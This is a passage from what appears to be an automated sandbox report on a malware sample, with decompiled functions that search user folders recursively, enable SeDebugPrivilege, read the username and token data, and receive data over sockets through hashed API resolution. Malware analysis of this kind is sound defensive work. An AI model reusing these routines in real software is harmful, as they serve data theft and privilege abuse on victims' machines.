2 API calls 9245->9246 9247 404b33 9246->9247 9251 404b66 9247->9251 9261 4049b3 9247->9261 9250 402bab 2 API calls 9250->9251 9251->9240 9253 4056bf 2 API calls 9252->9253 9254 40e952 9253->9254 9255 40e976 9254->9255 9256 4057df 13 API calls 9254->9256 9255->9241 9257 40e966 9256->9257 9258 413aca 4 API calls 9257->9258 9259 40e970 9258->9259 9260 405695 2 API calls 9259->9260 9260->9255 9262 4031e5 4 API calls 9261->9262 9263 4049c6 9262->9263 9263->9250 9263->9251 9264 4139de 9273 413855 9264->9273 9266 4139f1 9267 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9266->9267 9270 4139f7 9267->9270 9268 413866 59 API calls 9269 413a2d 9268->9269 9271 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9269->9271 9270->9268 9272 413a34 9271->9272 9274 4031e5 4 API calls 9273->9274 9275 413864 9274->9275 9275->9275 9895 4116e7 9896 4117ba 9895->9896 9897 4117f1 9896->9897 9898 405b6f 6 API calls 9896->9898 9899 4117d0 9898->9899 9899->9897 9900 404cbf 8 API calls 9899->9900 9901 4117eb 9900->9901 9902 402bab 2 API calls 9901->9902 9902->9897 9295 4094e7 9296 404b22 6 API calls 9295->9296 9297 4094fe 9296->9297 9298 409554 9297->9298 9299 405b6f 6 API calls 9297->9299 9300 409514 9299->9300 9302 404b22 6 API calls 9300->9302 9307 40954d 9300->9307 9301 402bab 2 API calls 9301->9298 9303 40952d 9302->9303 9304 409408 15 API calls 9303->9304 9309 409544 9303->9309 9306 40953e 9304->9306 9305 402bab 2 API calls 9305->9307 9308 402bab 2 API calls 9306->9308 9307->9301 9308->9309 9309->9305 9318 4058ea 9319 4031e5 4 API calls 9318->9319 9320 4058fd StrStrA 9319->9320 9947 40d4ea 9948 404bee 6 API calls 9947->9948 9949 40d500 9948->9949 9950 40d5a0 9949->9950 9951 404bee 6 API calls 9949->9951 9952 40d529 9951->9952 9953 404bee 6 API calls 9952->9953 9954 40d537 9953->9954 9955 404bee 6 API calls 9954->9955 9956 40d546 9955->9956 9956->9950 9957 405872 4 API calls 9956->9957 9958 40d56d 9957->9958 9959 405872 4 API calls 9958->9959 9960 40d57c 9959->9960 9961 405872 4 API calls 9960->9961 9962 40d58e 9961->9962 9963 405872 4 API calls 9962->9963 9963->9950 9964 40a3ea 9965 40374e 6 API calls 9964->9965 9966 40a403 9965->9966 9967 40a419 9966->9967 9968 4059d8 4 API calls 9966->9968 9969 40a411 9968->9969 9970 402bab 2 API calls 9969->9970 9970->9967 9358 404df3 WSAStartup 9362 4091f6 9363 404b22 6 API calls 9362->9363 9364 40920b 9363->9364 9365 409222 9364->9365 9366 409408 15 API calls 9364->9366 9367 40921c 9366->9367 9368 402bab 2 API calls 9367->9368 9368->9365 9997 4117fe 9998 404c4e 6 API calls 9997->9998 9999 411888 9998->9999 10000 404c4e 6 API calls 9999->10000 10006 411925 9999->10006 10001 4118ab 10000->10001 10001->10006 10016 4119b3 10001->10016 10003 4118c5 10004 4119b3 4 API calls 10003->10004 10005 4118d0 10004->10005 10005->10006 10007 4056bf 2 API calls 10005->10007 10008 4118fd 10007->10008 10009 405872 4 API calls 10008->10009 10010 41190a 10009->10010 10011 405872 4 API calls 10010->10011 10012 411915 10011->10012 10013 413aca 4 API calls 10012->10013 10014 41191f 10013->10014 10015 405695 2 API calls 10014->10015 10015->10006 10017 4119c6 10016->10017 10019 4119bf 10016->10019 10018 4031e5 4 API calls 10017->10018 10018->10019 10019->10003 9372 40e880 9373 41219c 14 API calls 9372->9373 9374 40e88e 9373->9374 9375 41219c 14 API calls 9374->9375 9376 40e89c 9375->9376 10083 40e48a 10084 404bee 6 API calls 10083->10084 10086 40e4d0 10084->10086 10085 40e4f4 10086->10085 10087 405872 4 API calls 10086->10087 10087->10085 9473 410390 9474 404b22 6 API calls 9473->9474 9476 4103a5 9474->9476 9475 410409 9476->9475 9477 405b6f 6 API calls 9476->9477 9482 4103ba 9477->9482 9478 410402 9479 402bab 2 API calls 9478->9479 9479->9475 9480 4103fb 9481 402bab 2 API calls 9480->9481 9481->9478 9482->9478 9482->9480 9483 403d74 19 API calls 9482->9483 9484 4103ee 9483->9484 9484->9480 9485 402bab 2 API calls 9484->9485 9485->9480 10098 40ed96 10099 4040bb 12 API calls 10098->10099 10113 40edb0 10099->10113 10100 40ef90 10101 40ef87 10102 403f9e 5 API calls 10101->10102 10102->10100 10103 405ae9 6 API calls 10103->10113 10104 412269 6 API calls 10104->10113 10105 40ef61 10106 40ef6e 10105->10106 10108 402bab 2 API calls 10105->10108 10107 40ef7c 10106->10107 10109 402bab 2 API calls 10106->10109 10107->10101 10110 402bab 2 API calls 10107->10110 10108->10106 10109->10107 10110->10101 10111 402bab GetProcessHeap RtlFreeHeap 10111->10113 10112 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 10112->10113 10113->10100 10113->10101 10113->10103 10113->10104 10113->10105 10113->10111 10113->10112 10114 40ef98 10115 404c4e 6 API calls 10114->10115 10116 40efb6 10115->10116 10124 40f02a 10116->10124 10129 40f054 10116->10129 10119 404bee 6 API calls 10120 40efda 10119->10120 10121 404bee 6 API calls 10120->10121 10122 40efe9 10121->10122 10123 405872 4 API calls 10122->10123 10122->10124 10125 40f008 10123->10125 10126 405872 4 API calls 10125->10126 10127 40f01a 10126->10127 10128 405872 4 API calls 10127->10128 10128->10124 10130 40f064 10129->10130 10131 402b7c 2 API calls 10130->10131 10133 40f072 10131->10133 10132 40efca 10132->10119 10133->10132 10135 405ecd 10133->10135 10136 4059b8 4 API calls 10135->10136 10137 405edf 10136->10137 10137->10133 9492 410c98 9493 41219c 14 API calls 9492->9493 9494 410ca8 9493->9494 9495 41219c 14 API calls 9494->9495 9496 410cb5 9495->9496 9497 412093 20 API calls 9496->9497 9498 410cc9 9497->9498 10207 41249c 10208 4056bf 2 API calls 10207->10208 10209 4124aa 10208->10209 10210 4057df 13 API calls 10209->10210 10215 4124ce 10209->10215 10211 4124be 10210->10211 10212 413aca 4 API calls 10211->10212 10213 4124c8 10212->10213 10214 405695 2 API calls 10213->10214 10214->10215 9502 40f49e 9503 40f4b6 13 API calls 9502->9503 9504 40f4a8 9503->9504 9505 40929e 9506 413b28 6 API calls 9505->9506 9507 4092a4 9506->9507 9508 405b6f 6 API calls 9507->9508 9509 4092af 9508->9509 9510 4092c5 9509->9510 9511 409408 15 API calls 9509->9511 9512 4092bf 9511->9512 9513 402bab 2 API calls 9512->9513 9513->9510 10234 407fa4 10235 407fb7 10234->10235 10236 402b7c 2 API calls 10235->10236 10238 407fee 10235->10238 10237 40800d 10236->10237 10237->10238 10239 4037be 4 API calls 10237->10239 10240 40803c 10239->10240 10241 402bab 2 API calls 10240->10241 10241->10238 9550 4090aa 9551 404b22 6 API calls 9550->9551 9552 4090c1 9551->9552 9553 4090d8 9552->9553 9554 409408 15 API calls 9552->9554 9555 404b22 6 API calls 9553->9555 9556 4090d2 9554->9556 9557 4090eb 9555->9557 9558 402bab 2 API calls 9556->9558 9559 408c4d 15 API calls 9557->9559 9562 409104 9557->9562 9558->9553 9560 4090fe 9559->9560 9561 402bab 2 API calls 9560->9561 9561->9562 9569 409cae 9584 404b79 9569->9584 9571 409cc5 9572 409d27 9571->9572 9573 405b6f 6 API calls 9571->9573 9575 409d2f 9571->9575 9574 402bab 2 API calls 9572->9574 9576 409cec 9573->9576 9574->9575 9576->9572 9577 404b79 6 API calls 9576->9577 9578 409d05 9577->9578 9579 409d1e 9578->9579 9580 408c4d 15 API calls 9578->9580 9581 402bab 2 API calls 9579->9581 9582 409d18 9580->9582 9581->9572 9583 402bab 2 API calls 9582->9583 9583->9579 9585 404b22 6 API calls 9584->9585 9586 404b8a 9585->9586 9586->9571 10301 411fb3 10302 405b6f 6 API calls 10301->10302 10304 412013 10302->10304 10303 412075 10304->10303 10305 41206a 10304->10305 10320 411a8d 10304->10320 10307 402bab 2 API calls 10305->10307 10307->10303 10309 4056bf 2 API calls 10310 41203d 10309->10310 10311 405872 4 API calls 10310->10311 10312 41204a 10311->10312 10313 413aca 4 API calls 10312->10313 10314 412054 10313->10314 10315 405695 2 API calls 10314->10315 10316 41205a 10315->10316 10317 413a58 13 API calls 10316->10317 10318 412064 10317->10318 10319 402bab 2 API calls 10318->10319 10319->10305 10321 402b7c 2 API calls 10320->10321 10322 411aa3 10321->10322 10340 411f05 10322->10340 10343 404ada 10322->10343 10325 404ada 4 API calls 10326 411cad 10325->10326 10327 411f0c 10326->10327 10328 411cc0 10326->10328 10329 402bab 2 API calls 10327->10329 10346 405eb6 10328->10346 10329->10340 10331 411d3c 10332 4031e5 4 API calls 10331->10332 10341 411d7b 10332->10341 10333 411ea6 10334 4031e5 4 API calls 10333->10334 10335 411eb5 10334->10335 10336 4031e5 4 API calls 10335->10336 10337 411ed6 10336->10337 10338 405eb6 4 API calls 10337->10338 10338->10340 10339 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10339->10341 10340->10305 10340->10309 10341->10333 10341->10339 10342 405eb6 4 API calls 10341->10342 10342->10341 10344 4031e5 4 API calls 10343->10344 10345 404afd 10344->10345 10345->10325 10347 405998 4 API calls 10346->10347 10348 405ec8 10347->10348 10348->10331 9616 40f6b8 9617 41219c 14 API calls 9616->9617 9618 40f6c7 9617->9618 9619 41219c 14 API calls 9618->9619 9620 40f6d5 9619->9620 9621 41219c 14 API calls 9620->9621 9622 40f6df 9621->9622 9641 40d6bd 9642 4056bf 2 API calls 9641->9642 9643 40d6c9 9642->9643 9654 404cbf 9643->9654 9646 404cbf 8 API calls 9647 40d6f4 9646->9647 9648 404cbf 8 API calls 9647->9648 9649 40d702 9648->9649 9650 413aca 4 API calls 9649->9650 9651 40d711 9650->9651 9652 405695 2 API calls 9651->9652 9653 40d71f 9652->9653 9655 402b7c 2 API calls 9654->9655 9656 404ccd 9655->9656 9657 404ddc 9656->9657 9658 404b8f 5 API calls 9656->9658 9657->9646 9659 404ce4 9658->9659 9660 404dd4 9659->9660 9662 402b7c 2 API calls 9659->9662 9661 402bab 2 API calls 9660->9661 9661->9657 9669 404d04 9662->9669 9663 404dcc 9664 404a39 5 API calls 9663->9664 9664->9660 9665 404dc6 9667 402bab 2 API calls 9665->9667 9666 402b7c 2 API calls 9666->9669 9667->9663 9668 404b8f 5 API calls 9668->9669 9669->9663 9669->9665 9669->9666 9669->9668 9670 402bab GetProcessHeap RtlFreeHeap 9669->9670 9671 404a39 5 API calls 9669->9671 9672 405b6f 6 API calls 9669->9672 9673 404cbf 8 API calls 9669->9673 9670->9669 9671->9669 9672->9669 9673->9669 9674 40f0bf 9675 4056bf 2 API calls 9674->9675 9676 40f0c9 9675->9676 9677 40f115 9676->9677 9679 404cbf 8 API calls 9676->9679 9678 41219c 14 API calls 9677->9678 9680 40f128 9678->9680 9681 40f0ed 9679->9681 9682 404cbf 8 API calls 9681->9682 9683 40f0fb 9682->9683 9684 413aca 4 API calls 9683->9684 9685 40f10a 9684->9685 9686 405695 2 API calls 9685->9686 9686->9677

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 154 403f97-403f9d 152->154 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 166 403e75-403e90 call 4031e5 FindNextFileW 159->166 167 403dde-403de2 159->167 160->150 175 403f03-403f0a 161->175 176 403efa-403f01 161->176 162->152 166->159 179 403e96-403e97 call 403bef 166->179 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 188 403e30-403e4c call 405b6f 172->188 189 403e24-403e2e 172->189 173->166 185 403dfb-403e10 call 405eff 173->185 181 403f12-403f2d call 405b6f 175->181 182 403f0c-403f10 175->182 176->175 180 403f41-403f5c call 4031e5 FindNextFileW 176->180 193 403e9c 179->193 196 403f87-403f88 call 403bef 180->196 197 403f5e-403f61 180->197 181->180 199 403f2f-403f33 181->199 182->180 182->181 185->166 185->172 188->166 203 403e4e-403e6f call 403d74 call 402bab 188->203 189->166 189->188 193->160 207 403f8d 196->207 197->161 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->180 217->154
                    C-Code - Quality: 85%
                    			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                    				struct _WIN32_FIND_DATAW _v596;
                    				void* __ebx;
                    				WCHAR* _t32;
                    				void* _t35;
                    				int _t43;
                    				void* _t52;
                    				int _t56;
                    				intOrPtr _t60;
                    				void* _t66;
                    				void* _t73;
                    				void* _t74;
                    				WCHAR* _t98;
                    				void* _t99;
                    				void* _t100;
                    				void* _t101;
                    				WCHAR* _t102;
                    				void* _t103;
                    				void* _t104;
                    
                    				L004067C4(0xa); // executed
                    				_t72 = 0;
                    				_t100 = 0x2e;
                    				_t106 = _a16;
                    				if(_a16 == 0) {
                    					L15:
                    					_push(_a8);
                    					_t32 = E00405B6F(0, L"%s\\%s", _a4); // executed
                    					_t98 = _t32;
                    					_t104 = _t103 + 0xc;
                    					if(_t98 == 0) {
                    						L30:
                    						__eflags = 0;
                    						return 0;
                    					}
                    					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                    					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                    					_t73 = _t35;
                    					if(_t73 == 0xffffffff) {
                    						L29:
                    						E00402BAB(_t98);
                    						goto L30;
                    					}
                    					L17:
                    					while(1) {
                    						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                    							if(_v596.dwFileAttributes != 0x10) {
                    								L21:
                    								_push( &(_v596.cFileName));
                    								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                    								_t104 = _t104 + 0xc;
                    								if(_t101 == 0) {
                    									goto L24;
                    								}
                    								if(_a12 == 0) {
                    									E00402BAB(_t98);
                    									E00403BEF(_t73);
                    									return _t101;
                    								}
                    								_a12(_t101);
                    								E00402BAB(_t101);
                    								goto L24;
                    							}
                    							_t124 = _a20;
                    							if(_a20 == 0) {
                    								goto L24;
                    							}
                    							goto L21;
                    						} else {
                    							L24:
                    							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                    							_t43 = FindNextFileW(_t73,  &_v596); // executed
                    							if(_t43 == 0) {
                    								E00403BEF(_t73); // executed
                    								goto L29;
                    							}
                    							_t100 = 0x2e;
                    							continue;
                    						}
                    					}
                    				}
                    				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                    				if(_t102 == 0) {
                    					L14:
                    					_t100 = 0x2e;
                    					goto L15;
                    				}
                    				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                    				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                    				_t74 = _t52;
                    				if(_t74 == 0xffffffff) {
                    					L13:
                    					E00402BAB(_t102);
                    					_t72 = 0;
                    					goto L14;
                    				} else {
                    					goto L3;
                    				}
                    				do {
                    					L3:
                    					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                    						goto L11;
                    					}
                    					if(_a24 == 0) {
                    						L7:
                    						if(E00405D24( &(_v596.cFileName)) >= 3) {
                    							L9:
                    							_push( &(_v596.cFileName));
                    							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                    							_t103 = _t103 + 0xc;
                    							_a16 = _t60;
                    							_t115 = _t60;
                    							if(_t60 == 0) {
                    								goto L11;
                    							}
                    							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                    							E00402BAB(_a16);
                    							_t103 = _t103 + 0x1c;
                    							if(_t99 != 0) {
                    								E00402BAB(_t102);
                    								E00403BEF(_t74);
                    								return _t99;
                    							}
                    							goto L11;
                    						}
                    						_t66 = 0x2e;
                    						_t114 = _v596.cFileName - _t66;
                    						if(_v596.cFileName == _t66) {
                    							goto L11;
                    						}
                    						goto L9;
                    					}
                    					_push(L"Windows");
                    					if(E00405EFF( &(_v596.cFileName)) != 0) {
                    						goto L11;
                    					}
                    					_push(L"Program Files");
                    					if(E00405EFF( &(_v596.cFileName)) != 0) {
                    						goto L11;
                    					}
                    					goto L7;
                    					L11:
                    					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                    					_t56 = FindNextFileW(_t74,  &_v596); // executed
                    				} while (_t56 != 0);
                    				E00403BEF(_t74); // executed
                    				goto L13;
                    			}





















                    0x00403d82
                    0x00403d88
                    0x00403d8c
                    0x00403d8d
                    0x00403d90
                    0x00403ea9
                    0x00403ea9
                    0x00403eb4
                    0x00403eb9
                    0x00403ebb
                    0x00403ec0
                    0x00403f95
                    0x00403f95
                    0x00000000
                    0x00403f95
                    0x00403ece
                    0x00403edb
                    0x00403edd
                    0x00403ee2
                    0x00403f8e
                    0x00403f8f
                    0x00000000
                    0x00403f94
                    0x00000000
                    0x00403ee8
                    0x00403ef8
                    0x00403f0a
                    0x00403f12
                    0x00403f18
                    0x00403f26
                    0x00403f28
                    0x00403f2d
                    0x00000000
                    0x00000000
                    0x00403f33
                    0x00403f76
                    0x00403f7c
                    0x00000000
                    0x00403f83
                    0x00403f36
                    0x00403f3a
                    0x00000000
                    0x00403f40
                    0x00403f0c
                    0x00403f10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403f41
                    0x00403f41
                    0x00403f4b
                    0x00403f58
                    0x00403f5c
                    0x00403f88
                    0x00000000
                    0x00403f8d
                    0x00403f60
                    0x00000000
                    0x00403f60
                    0x00403ef8
                    0x00403ee8
                    0x00403da3
                    0x00403da9
                    0x00403ea6
                    0x00403ea8
                    0x00000000
                    0x00403ea8
                    0x00403db7
                    0x00403dc4
                    0x00403dc6
                    0x00403dcb
                    0x00403e9d
                    0x00403e9e
                    0x00403ea4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403dd1
                    0x00403dd1
                    0x00403dd8
                    0x00000000
                    0x00000000
                    0x00403de2
                    0x00403e12
                    0x00403e22
                    0x00403e30
                    0x00403e36
                    0x00403e3f
                    0x00403e44
                    0x00403e47
                    0x00403e4a
                    0x00403e4c
                    0x00000000
                    0x00000000
                    0x00403e63
                    0x00403e65
                    0x00403e6a
                    0x00403e6f
                    0x00403f64
                    0x00403f6a
                    0x00000000
                    0x00403f71
                    0x00000000
                    0x00403e6f
                    0x00403e26
                    0x00403e27
                    0x00403e2e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e2e
                    0x00403dea
                    0x00403df9
                    0x00000000
                    0x00000000
                    0x00403e01
                    0x00403e10
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403e75
                    0x00403e7f
                    0x00403e8c
                    0x00403e8e
                    0x00403e97
                    0x00000000

                    APIs
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID: %s\%s$%s\*$Program Files$Windows
                    • API String ID: 1690352074-2009209621
                    • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                    • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                    				void* _v8;
                    				struct _LUID _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				struct _TOKEN_PRIVILEGES _v32;
                    				intOrPtr* _t13;
                    				void* _t14;
                    				int _t16;
                    				int _t31;
                    				void* _t32;
                    
                    				_t31 = 0;
                    				E004060AC();
                    				_t32 = __eax;
                    				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                    				_t14 =  *_t13(_t32, 0x28,  &_v8);
                    				if(_t14 != 0) {
                    					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                    					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                    					if(_t16 != 0) {
                    						_push(__ebx);
                    						_v32.Privileges = _v16.LowPart;
                    						_v32.PrivilegeCount = 1;
                    						_v24 = _v16.HighPart;
                    						_v20 = 2;
                    						E004031E5(1, 9, 0xc1642df2, 0, 0);
                    						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                    						_t31 =  !=  ? 1 : 0;
                    					}
                    					E00403C40(_v8);
                    					return _t31;
                    				}
                    				return _t14;
                    			}













                    0x00406512
                    0x00406514
                    0x00406522
                    0x00406524
                    0x00406530
                    0x00406534
                    0x0040653f
                    0x0040654e
                    0x00406552
                    0x0040655a
                    0x0040655f
                    0x0040656d
                    0x00406570
                    0x00406573
                    0x0040657a
                    0x00406589
                    0x0040658d
                    0x00406590
                    0x00406594
                    0x00000000
                    0x0040659a
                    0x004065a1

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID: SeDebugPrivilege
                    • API String ID: 3615134276-2896544425
                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402B7C(long _a4) {
                    				void* _t4;
                    				void* _t7;
                    
                    				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                    				_t7 = _t4;
                    				if(_t7 != 0) {
                    					E00402B4E(_t7, 0, _a4);
                    				}
                    				return _t7;
                    			}





                    0x00402b8c
                    0x00402b92
                    0x00402b96
                    0x00402b9e
                    0x00402ba3
                    0x00402baa

                    APIs
                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateProcess
                    • String ID:
                    • API String ID: 1357844191-0
                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406069(WCHAR* _a4, DWORD* _a8) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                    				_t4 = GetUserNameW(_a4, _a8); // executed
                    				return _t4;
                    			}





                    0x00406077
                    0x00406082
                    0x00406085

                    APIs
                    • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                    • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                    Memory Dump Source
                    • Source File: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062df call 4031e5 265->273 266->257 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                    C-Code - Quality: 75%
                    			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                    				int _v8;
                    				long _v12;
                    				int _v16;
                    				int _v20;
                    				char _v24;
                    				char _v28;
                    				char _v32;
                    				intOrPtr* _t25;
                    				int _t27;
                    				int _t30;
                    				int _t31;
                    				int _t36;
                    				int _t37;
                    				intOrPtr* _t39;
                    				int _t40;
                    				long _t44;
                    				intOrPtr* _t45;
                    				int _t46;
                    				void* _t48;
                    				int _t49;
                    				void* _t67;
                    				void* _t68;
                    				void* _t74;
                    
                    				_t48 = __ebx;
                    				_t67 = 0;
                    				_v8 = 0;
                    				E00402BF2();
                    				_t68 = __eax;
                    				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                    				_t2 =  &_v8; // 0x414449
                    				_push(1);
                    				_push(8);
                    				_push(_t68);
                    				if( *_t25() != 0) {
                    					L4:
                    					_t27 = E00402B7C(0x208);
                    					_v20 = _t27;
                    					__eflags = _t27;
                    					if(_t27 != 0) {
                    						E0040338C(_t27, _t67, 0x104);
                    						_t74 = _t74 + 0xc;
                    					}
                    					_push(_t48);
                    					_t49 = E00402B7C(0x208);
                    					__eflags = _t49;
                    					if(_t49 != 0) {
